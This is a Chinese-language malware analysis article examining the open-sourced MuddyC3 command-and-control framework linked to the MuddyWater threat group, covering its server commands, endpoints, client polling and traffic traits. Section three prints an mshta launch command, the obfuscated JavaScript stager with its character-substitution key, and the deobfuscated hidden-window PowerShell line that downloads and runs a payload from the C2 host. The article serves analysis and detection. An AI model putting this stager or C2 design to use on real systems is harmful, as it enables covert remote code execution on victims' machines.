污水攻击MuddyC3开源代码分析
- 2019 年 10 月 6 日
- 筆記
前言
MuddyWater是一个伊朗威胁组织,主要针对中东、欧洲和北美国家。该组织针对的目标主要是电信,政府(IT服务)和石油部门。众多安全研究机构针对muddywater的样本进行了深入的研究。2019年6月24日,名为0xffff0800的用户在twitter上发表推文表示,其开源了污水攻击的python版代码。本文就该代码,一窥muddywater的攻击过程。

该用户在github上开源的代码有两个版本,本次我们分析的是1.0.1版本。

整体结构

MuddyC3的整体C2通信结构图如上所示:
整个通信过程有三个要素,即攻击端、C2网站和目的主机。其中C2网站指的是被攻击者拿到控制权限的web网站。C2网站可能不止一个。攻击过程中,攻击者将攻击指令以powershell代码的形式注入C2网站,被感染的目的主机主动向C2网站发送http请求,得到攻击命令,调用powershell接口执行命令。
APT攻击分三个阶段进行,分别是:(1)感染;(2)C2通信;(3)信息泄漏。本文中我们直接将恶意程序部署在目标主机上,因此感染阶段略去不提。值得注意的是,真实场景中,污水攻击感染过程通过传播宏病毒展开。目标主机感染宏病毒后会进行修改注册表等操作。
一、服务端
1.1服务端运行
运行muddyc3.py文件

需要输入ip、端口和是否需要代理输入完成后进入命令界面(见1.1.6help命令)
1.1.1 list命令
用来列举agent信息,列举结果示意如下:

1.1.2 show命令
目前尚未开发。
1.1.3 use命令
use命令后需要agent id作为参数,命令格式为:
use id
命令结果是进入id下的命令界面:

在该界面发出命令,相应命令分析见2.2.2节。以/get命令为例:

1.1.4 payload命令
payload命令列举出目前服务端程序中已有的powershell注入命令。

1.1.5 back命令

1.1.6 help命令

1.1.7 exit命令

exit命令结束客户端程序。
1.2参数分析
通过分析core.cmd.py文件,得出AGENTS字典中每个元素的结构如下:
角标 |
参数 |
归属 |
---|---|---|
* |
id |
key值 |
0 |
ExternalIP |
data |
1 |
id |
data |
2 |
status |
data |
3 |
os |
data |
4 |
InternalIP |
data |
5 |
Arch |
data |
6 |
ComputerName |
data |
7 |
UserName |
data |
AGENT是一个'id:data'形式的字典,其中data格式如下:
角标 |
参数 |
---|---|
0 |
id |
1 |
status |
2 |
Internal IP |
3 |
OS |
4 |
Arch |
5 |
Computer Name |
6 |
User Name |
在core.webserver.py文件中,url访问功能分类如下:
编号 |
类别 |
表示方法 |
get/post |
功能或结果 |
---|---|---|---|---|
1 |
index |
/ |
get |
返回‘hello’ |
2 |
payload |
/get |
get |
返回‘config/PAYLOAD()’ |
3 |
payloadc |
/getc |
get |
返回‘toB52(config/PAYLOAD())’ |
4 |
payloadjf |
/hjf |
get |
返回C://ProgramData下a.zip和b.ps1 |
5 |
payloadjfs |
/hjfs |
get |
返回C://ProgramData下sct.ini |
6 |
sct |
/sct |
get |
返回ps1文件 |
7 |
mshta |
/hta |
get |
返回ps1文件 |
8 |
info |
/info/~ |
post |
查询id,若不存在则在AGENTS中添加 |
9 |
download |
/dl/~ |
post |
从服务端指定路径下载文件 |
10 |
upload |
/up |
暂不支持该功能 |
|
11 |
img |
/img/~ |
post |
得到相关img |
12 |
command |
/cm/~ |
get |
得到‘config.COMMAND[id]’中的命令 |
13 |
result |
/re/~ |
post |
得到指定id主机的data |
14 |
modules |
/md/~ |
post |
添加模块 |
1.3webserver分析
运行后可以访问之前输入的C&C地址
访问index路径,即192.168.11.193:1234

访问get路径,得到payload


访问/getc路径得到payload的base64编码,另有/hjf、/hjfs路径与此相似
访问download路径




访问/info,由于info使用post包,

调整AGENTS和post请求包body结构后,结果如下:

第二次添加

访问info路径的post请求组成:

二、客户端
2.1客户端运行
python脚本中运行powershell命令,会出现安全问题

以管理员身份运行powershell,


2.2客户端流程
2.2.1访问/info
客户端开启后,首先访问/info进行注册,注册用id在本地是以随机数形式确定,然后向服务端发送post包。客户端首先向服务端询问对应id是否存在,若存在则服务端返回‘NONE’,客户端重新选取随机数进行注册直至成功。注册成功后,客户端反馈:

2.2.2访问/cm
带id访问/cm接口,访问/cm/[id],取得服务端发送的控制命令,控制命令组成如下:
编号 |
表示 |
意义 |
---|---|---|
1 |
/get |
访问/get接口 |
2 |
/getc |
访问/getc接口 |
3 |
/hjf |
访问/hjf接口 |
4 |
/hjfs |
访问/hjfs接口 |
5 |
/sct |
访问/sct接口 |
6 |
/hta |
访问/hta接口 |
7 |
dl |
访问/dl接口 |
8 |
/up |
访问/up接口 |
9 |
/img |
访问/img接口 |
10 |
/md |
访问/md接口 |
11 |
其他 |
其他powershell可以直接执行的命令 |
服务端顺序发出了三个命令:

客户端取命令:



由此可见客户端取命令时按服务端下命令的顺序,一次取一个,取完之后所有命令后,再访问/cm/[id],得到的数据为空

2.2.3访问/re
客户端取出命令后执行,然后在/re/[id]接口返回执行结果。服务端的显示:

客户端的显示:

三、powershell命令分析
污水攻击的命令均以powershell方式执行,接下来我们跟随服务端给出的顺序来分析powershell命令。首先,服务端启动时,给出的网址为:
mshta http://192.168.11.193:1234/hta
访问hta:得到的js代码为:
var es = '%gk{dmFyI!~tPSJw,3dlcn~oZW-sI%1le!VjI!J5c!FzcyAtdyA-I%1jI%RWPW5ldy1vYmplY3Qg,mV0LndlYm~s[WVud@skVi5wc**4eT1,TmV0LldlYlJlcXVlc3Rd}jp$ZXRTeX~0ZW1XZWJQc**4eSgp}yRWLlBy,3h5Lk~yZWRl,nRpYW-zPVt}ZXQuQ3JlZ!Vud!lh,*~hY2hlXTo6R!VmYXVsd*~yZWRl,nRpYW-z}0lFW%gkVi5k,3du,!9hZ$~0cmluZygn[$R0c@ovLz*5Mi4-~jguMT*uMTkz}j*yMzQvZ2V0Jykp}yI7%nZhciB3MzJwcz0gR2V0T2JqZW~0{%d3[W5tZ210czon{S5$ZXQoJ1dp,jMyX1By,2~lc3~Td!Fyd$VwJyk7%nczMnBzLl~wYXduSW5zd!FuY2Vf{%k7%nczMnBzLl~o,3dX[W5k,3c9M@s{dmFyI$J0cm5@,2RlPUdld*9i[mVjd%gnd2lu,Wdtd$M6JykuR2V0{%dX[W4zMl9Qc**jZX~zJykuQ3JlYXRl{!~tL%dj}l-cJy-3MzJwcy-udW-s{Ts{'; eval(bas(es));
其中对es变量做了如下混淆:
string = replaceAll(']','=',string); string = replaceAll('[','a',string); string = replaceAll(',','b',string); string = replaceAll('@','D',string); string = replaceAll('-','x',string); string = replaceAll('~','N',string); string = replaceAll('*','E',string); string = replaceAll('%','C',string); string = replaceAll('$','H',string); string = replaceAll('!','G',string); string = replaceAll('{','K',string); string = replaceAll('}','O',string); var characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="; var result = '';
解混淆后得到的js代码如下:
var cm="powershell -exec bypass -w 1 -c $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($V.downloadstring('http://192.168.11.193:1234/get'));"; var w32ps= GetObject('winmgmts:').Get('Win32_ProcessStartup'); w32ps.SpawnInstance_(); w32ps.ShowWindow=0; var rtrnCode=GetObject('winmgmts:').Get('Win32_Process').Create(cm,'c:\',w32ps,null);
在powershell中执行后,向http://192.168.11.193:1234/get发get请求,得到已经存在于服务端的payload.ps1文件的内容,但是由于payload.ps1没有开源,所以powershell的解析不能继续向下进行。
四、流量分析
捕获本地流量如下:


目的端口是在服务端输入指定,源端口随机。
(本次实验中指定的目的端口为1234,源端口从9141开始,每个包累加)
五、污水攻击特点总结
5.1心跳周期
被控端定期向主控端发出get请求,查看是否有新的命令。
http://192.168.11.193:1234/cm/[id]
5.2 http请求成对出现
一次取命令对应一次命令执行结果回传。
http://192.168.11.193:1234/cm/[id] http://192.168.11.193:1234/re/[id]
5.3云控下发powershell脚本
传统远控采取命令约定方式,主控端向被控端发送命令代码,被控端在后门代码中匹配成功然后执行。
而污水攻击不再使用命令代码,而是就地采用被控端本地现有工具powershell,将命令以高度混淆的powershell形式下发,这样做保证了样本即使被捕获,恶意活动不会暴露、C2服务器不会被溯源。
5.4可滥用web2.0网站作为信息传输中介
任何主机可以不经注册访问网站,向网站发出http请求。
污水攻击利用的web2.0网站的服务器是攻击者控制的,因此有被溯源的风险。
5.5协议:http
明文不加密。
相关链接
【1】开源代码地址:https://github.com/0xffff0800/MuddyC3v1.0.1- 【2】muddywater相关介绍:https://attack.mitre.org/groups/G0069/
*本文作者:BUPT/Yoni,转载请注明来自FreeBuf.COM